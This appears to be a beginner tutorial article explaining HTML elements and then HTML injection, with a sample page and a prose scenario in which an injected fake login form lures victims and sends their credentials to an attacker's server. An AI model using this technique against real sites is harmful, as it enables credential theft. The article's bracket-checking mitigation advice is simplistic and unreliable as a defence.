HTML is considered as the skeleton for every web application, as it defines the structure and the complete posture of the hosted content. Today, in this article we will learn how such misconfigured HTML codes open the gates for the attackers to manipulate the designed webpages and steals sensitive data from users.
What is HTML?
HTML is an abbreviation to “Hyper Text Markup Language”, which is the basic building block of a website.It,determines the formation of webpages over a web-application. HTML is used to design websites that consist of the “Hyper Text” to include “text inside a text” as a hyperlink and a combination of elements that wrap up the data items to display in the browser.
What these elements are?
- An element is everything to an HTML page i.e. it contains the opening and closing tag with the text content in between.
<h1> HTML Injection</h1>
HTML Tag:
HTML tag label is a piece of content that includes ‘heading’, ’paragraph’, and ’form’ to name a few. These are the names of the elements surrounded by angle brackets and are of two types the “start tag” also known as an opening tag and the “end tag” which is referred to as the closing one. Browsers do not display these HTML tags but utilize them to grab up the content of the webpages.
HTML Attributes:
In order to provide some extra information to the elements, we use the attribute, they reside inside the start tag and comes in “name/value” pairs, such that the attribute name follows up with an “equal-to sign” and the attribute value is enclosed with the “quotation marks”.
<a href = “http://hacker.in”>Hack Here the “href” is the “attribute name” and http://hacker.in is the “attribute value”. As we are now aware of the basic HTML terminologies,let us check out the “HTML element flowchart” and try implementing them all into creating a simple webpage.
Basic HTML Page:
Every web page over the internet is some where or the other an HTML File. These files are nothing but a simple plain-text file with”.html” extension, that is saved and excited over a web browser.
So, let us try to create a simple web page in our notepad and save it as hacker.html:
<html>
<head>
<title> World of Hacker</title>
</head>
<Body bgcolor=”green”>
<br>
<center><h2>WELCOME TO <a href=”http://hacker.in”>WORLF OF HACKER </a></h2>
<br>
<p> Auther “Test Admin”</p>
</center>
</body>
</html>
Let us execute this “hacker.html” file in our browser and see what we have developed.
We have successfully designed our first web page. But now let us learn how these tags work.
- The <html> element is the root element of every HTML Page.
- The <Head> determines the meta-information about the document.
- The <title> element specifies a title for the webpage.
- The <body> element contains the visible page content that has the “bgcolor” as an attribute as “green”.
- The <br> element defines the break line or it defines up the next line.
- The <h1> element defines a large heading.
- The <p> element defines a paragraph.
- The <a> defines up the anchor tag which helps us to set up the “hyperlink”.
I guess you are now clear with “what HTML is and its major use” and “how can we implement all of this.”
Now let us try to find out the major loopholes and learn how the attackers inject arbitrary HTML codes into vulnerable web pages to modify the hosted content.
Introduction to HTML Injection:
HTML Injection which is also termed as “virtual defacements” is one of the simplest and the most common vulnerabilities that arise when the web page fails to sanitize the user-supplied input or validates the output. This allows the malicious HTML codes into the application through the vulnerable field, such that he can modify the content of the webpage and even steal some sensitive data.
Let us take a look at this scenario and learn how such HTML Injection attacks are executed:
Consider a web application that is suffering from HTML injection vulnerability and it does not validate any specific input. In such a scenario, if the attacker finds out the weakness, he may inject a malicious “HTML login form” with a lure of “Free movie tickets” to trick the victim into submitting his sensitive credentials.
Now as the victim surfs the webpage, he gets lured into availing the “Free movie tickets”. As he clicks the link, he gets redirected to an application’s login screen, which is nothing but the attacker’s crafted “HTML form”. Thereafter, once the victim enters his credentials, the attacker captures them all through his listener machine, which leads to a data breach or data compromise.
Impact of HTML Injection:
- It can allow an attacker to modify the page.
- To steal another person’s identity.
- The attacker discovers injection vulnerability and decides to use an HTML injection attack.
- Attacker crafts malicious links, including his injected HTML content, and sends it to a user via email.
- The user visits the page due to the page being located within a trusted domain.
- The attacker’s injected HTML is rendered and presented to the user asking for a username and password.
- The user enters a username and password, which are both sent to the attacker’s server.
Mitigation of HTML injection:
There is no doubt that the attack which occurred was mainly due to the developer’s negligence and lack of knowledge. This type of injection attack occurred due to the non-validation of the input and output. It is therefore essential to have appropriate data validation in place to prevent such attacks.
- Every input should be checked if it contains any script code or any HTML code. One should check, if the code contains any special script or HTML brackets – <script></script>, <html></html>.
- There are many functions for checking if the code contains any special brackets. The selection of the checking function depends on the programming language that you are using.